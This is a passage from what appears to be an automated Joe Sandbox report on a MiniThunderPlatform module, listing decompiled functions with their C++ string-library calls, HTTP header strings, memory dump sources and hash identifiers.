                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10078439
                                                                                                                                                • Part of subcall function 1006EAE0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 1006EB2B
                                                                                                                                                • Part of subcall function 1006EAE0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 1006EB45
                                                                                                                                                • Part of subcall function 1006EAE0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(temp_file), ref: 1006EB5C
                                                                                                                                                • Part of subcall function 1006EAE0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006EB95
                                                                                                                                                • Part of subcall function 1006EAE0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006EBA7
                                                                                                                                                • Part of subcall function 1006EAE0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006EBB9
                                                                                                                                                • Part of subcall function 1006EAE0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006EBE2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$V01@@V12@V12@@$?append@?$basic_string@Find$?assign@?$basic_string@?insert@?$basic_string@?rfind@?$basic_string@CloseFileFirstH_prologV01@Y?$basic_string@
                                                                                                                                              • String ID: .
                                                                                                                                              • API String ID: 624141042-248832578
                                                                                                                                              • Opcode ID: 135ae07c5e309f99da572efc94adb9459d4c8661426529d3204aa4ea8936b187
                                                                                                                                              • Instruction ID: 612344dde89720fb4289c818dc985e14f7ecfb9bd693884d8db02fbc1dc0a29a
                                                                                                                                              • Opcode Fuzzy Hash: 135ae07c5e309f99da572efc94adb9459d4c8661426529d3204aa4ea8936b187
                                                                                                                                              • Instruction Fuzzy Hash: 12814D754083808FD334CF25D888BDABBE4EFA9744F008A4DE5CA53292D7756648CFA2
                                                                                                                                              Function 10094280 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 146COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100942E4
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71( Keep-Alive), ref: 10094327
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Connection), ref: 100942B9
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,?,?,?,?,?,?,?,?,?,?,1027B92C,00000000,00000002), ref: 10093FB5
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10093FD4
                                                                                                                                                • Part of subcall function 10093F80: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?), ref: 10093FF5
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10094009
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009401B
                                                                                                                                              • ?find_first_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(HTTP/1.1,00000000,00000008), ref: 10094308
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Keep-Alive,?,?), ref: 1009435C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 100943A8
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100943C5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71( Close), ref: 100943E3
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Close,?,?), ref: 10094416
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10094460
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1009447A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$V01@@$??$?8?find_first_of@?$basic_string@D@1@@std@@D@2@@0@0@V?$basic_string@
                                                                                                                                              • String ID: Close$ Keep-Alive$Close$Connection$HTTP/1.1$Keep-Alive
                                                                                                                                              • API String ID: 3225138105-2207716512
                                                                                                                                              • Opcode ID: 32d469b83ed666c2d60db890628e84d45301e916d61141202984614f4982d47a
                                                                                                                                              • Instruction ID: 2afca65b7d706d4f326de83619ba4a439babb4fa8096d41977b80cfeaa485e27
                                                                                                                                              • Opcode Fuzzy Hash: 32d469b83ed666c2d60db890628e84d45301e916d61141202984614f4982d47a
                                                                                                                                              • Instruction Fuzzy Hash: BA51AF711083419FC320CF24C888B9AFBE8EF96794F518A5DF49A432D2CB74A949DF12
                                                                                                                                              Function 1001D46F Relevance: 27.2, APIs: 18, Instructions: 173COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1001D474
                                                                                                                                                • Part of subcall function 1001694C: RtlEnterCriticalSection.NTDLL(?), ref: 1001695C
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1001D4D5
                                                                                                                                                • Part of subcall function 100184D9: __EH_prolog.LIBCMT ref: 100184DE
                                                                                                                                                • Part of subcall function 100184D9: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100184FB
                                                                                                                                                • Part of subcall function 100184D9: ?find_first_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP71(0000003A,00000000), ref: 1001850B
                                                                                                                                                • Part of subcall function 100184D9: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 1001853A
                                                                                                                                                • Part of subcall function 100184D9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10018546
                                                                                                                                                • Part of subcall function 100184D9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001857C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001D4F0
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 1001D52E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001D53E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1001D553
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1001D564
                                                                                                                                              • ?find_first_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP71(0000003A,00000000), ref: 1001D574
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 1001D5A3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001D5AF
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1001D5BF
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1001D5ED
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001D60B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001D618
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001D625
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1001D64C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001D6BA
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1001D6DB
                                                                                                                                                • Part of subcall function 1001A696: __EH_prolog.LIBCMT ref: 1001A69B
                                                                                                                                                • Part of subcall function 1001A696: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,1001C201,00000000,00000000), ref: 1001A6A8
                                                                                                                                                • Part of subcall function 1001A696: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,1001C201,00000000,00000000), ref: 1001A6B6
                                                                                                                                                • Part of subcall function 10013A50: StringFromIID.COMBASE(?,?), ref: 10013A96
                                                                                                                                                • Part of subcall function 10013A50: lstrlenW.KERNEL32(?), ref: 10013AA7
                                                                                                                                                • Part of subcall function 10013A50: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000), ref: 10013AD6
                                                                                                                                                • Part of subcall function 10013A50: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(00000000), ref: 10013AEA
                                                                                                                                                • Part of subcall function 10013A50: CoTaskMemFree.COMBASE(?), ref: 10013AFC
                                                                                                                                                • Part of subcall function 10013A50: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10013B0B
                                                                                                                                                • Part of subcall function 10013A50: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10013B1B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$?assign@?$basic_string@V12@V12@@$CriticalH_prologSectionV01@@$?find_first_of@?$basic_string@Leave$ByteCharEnterFreeFromMultiStringTaskWidelstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2899546728-0
                                                                                                                                              • Opcode ID: 8c580b2a6125cdb2f1d752d3fca891322f33182ef50ae964ce93aab29445ec6f
                                                                                                                                              • Instruction ID: 59ac8e7709fb823c137b89c6d6daeea648b4e2f1132058a5f0f3d1a5611a1054
                                                                                                                                              • Opcode Fuzzy Hash: 8c580b2a6125cdb2f1d752d3fca891322f33182ef50ae964ce93aab29445ec6f
                                                                                                                                              • Instruction Fuzzy Hash: 02714F31900269DFDF11DBA4C948BDDBBB9EF29304F0441D9E50AA7191DB74AB89CF21
                                                                                                                                              Function 1005C380 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 163COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,00000000,?,00000000), ref: 1005C3C2
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71 ref: 1005C3E5
                                                                                                                                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP71(?,00000000,00000000), ref: 1005C403
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1005C419
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005C42B
                                                                                                                                                • Part of subcall function 10009F50: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400,00000026), ref: 10009F65
                                                                                                                                                • Part of subcall function 10009F50: ??3@YAXPAX@Z.MSVCR71(?,?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400), ref: 10009F76
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(1027B92C), ref: 1005C45B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005C48F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005C49C
                                                                                                                                              • inet_addr.WS2_32(00000002), ref: 1005C4C7
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1005C4DE
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1005C53D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71 ref: 1005C555
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005C5DC
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005C605
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$V01@@V12@$?assign@?$basic_string@V12@@$??3@?find@?$basic_string@?substr@?$basic_string@inet_addr
                                                                                                                                              • String ID: #
                                                                                                                                              • API String ID: 4073539127-1885708031
                                                                                                                                              • Opcode ID: a4ff00eb6cf873b878b729097e26f05a45ea5f7428009302b8666e096ffcda8f
                                                                                                                                              • Instruction ID: b28ee95735312f79dd750afbd82653e09784f3460151edb3a7d7690cd24dcf7e
                                                                                                                                              • Opcode Fuzzy Hash: a4ff00eb6cf873b878b729097e26f05a45ea5f7428009302b8666e096ffcda8f
                                                                                                                                              • Instruction Fuzzy Hash: A9615E71408392DFD330DB54C888FAFBBE4EB99604F444A5DF59A83252EB746548CBA3
                                                                                                                                              Function 10029600 Relevance: 25.6, APIs: 17, Instructions: 129COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,?), ref: 10029645
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?), ref: 10029659
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0,?,?,?), ref: 10029677
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0,?), ref: 10029689
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100296AA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100296B8
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(1027B998), ref: 100296C7
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100296E8
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100296F6
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(1027B994), ref: 10029705
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10029713
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBD@Z.MSVCP71(1027B998,?,00000000,?,00000000,?,?,?), ref: 10029738
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 10029759
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10029767
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,00000000,?,00000000,?,?,?), ref: 10029775
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,00000000,?,00000000,?,?,?), ref: 10029786
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10029799
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$?append@?$basic_string@V12@$V12@@$??1?$basic_string@$??0?$basic_string@$??$?9D@1@@std@@D@2@@0@V01@V01@@V?$basic_string@Y?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3445678870-0
                                                                                                                                              • Opcode ID: ebf599228aea2071a48c9f6d72dd729e60325a43fdb13175afa8716ad5768778
                                                                                                                                              • Instruction ID: 056f919e8539a1a77885e6b40d201ca2f31af14a36d6a175e682d574d3883a1a
                                                                                                                                              • Opcode Fuzzy Hash: ebf599228aea2071a48c9f6d72dd729e60325a43fdb13175afa8716ad5768778
                                                                                                                                              • Instruction Fuzzy Hash: DB419A71408391AFC711CF24CC9CA9BBBE8FFA9744F40091DF98683262DB34A549CB62
                                                                                                                                              Function 10099168 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 182stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1009916D
                                                                                                                                              • strstr.MSVCR71(?,,00000000,?,00000001), ref: 100991A9
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,00000000), ref: 100991C9
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(00000000,102768F0,-00000064), ref: 1009922B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009924C
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,-00000064), ref: 10099278
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10099285
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,-00000064), ref: 100992C7
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100992D4
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,-00000064), ref: 100992F6
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10099303
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$?assign@?$basic_string@V12@V12@@$??$?9??0?$basic_string@D@1@@std@@D@2@@0@H_prologV?$basic_string@mallocstrstr
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3181552730-2344752452
                                                                                                                                              • Opcode ID: 2ed8ec4f14c6ef4778e73fdc846fdc1b20ce02eb4e10b5c4d20766385d1132c8
                                                                                                                                              • Instruction ID: c7c5adfa567a656bbf0ba381d2e297abf3c08019f68c4dccbf6bf31105df7def
                                                                                                                                              • Opcode Fuzzy Hash: 2ed8ec4f14c6ef4778e73fdc846fdc1b20ce02eb4e10b5c4d20766385d1132c8
                                                                                                                                              • Instruction Fuzzy Hash: C471C930A00349EFDB14CFA8C998BEEBBF9EF58340F14405DE45AA7281CB756A05DB10
                                                                                                                                              Function 100BD480 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 92COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 100BD1D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to read!), ref: 100BD1FF
                                                                                                                                                • Part of subcall function 100BD1D0: _CxxThrowException.MSVCR71(?,102C95EC), ref: 100BD225
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 100BD4C6
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71 ref: 100BD4F6
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z.MSVCP71 ref: 100BD4FD
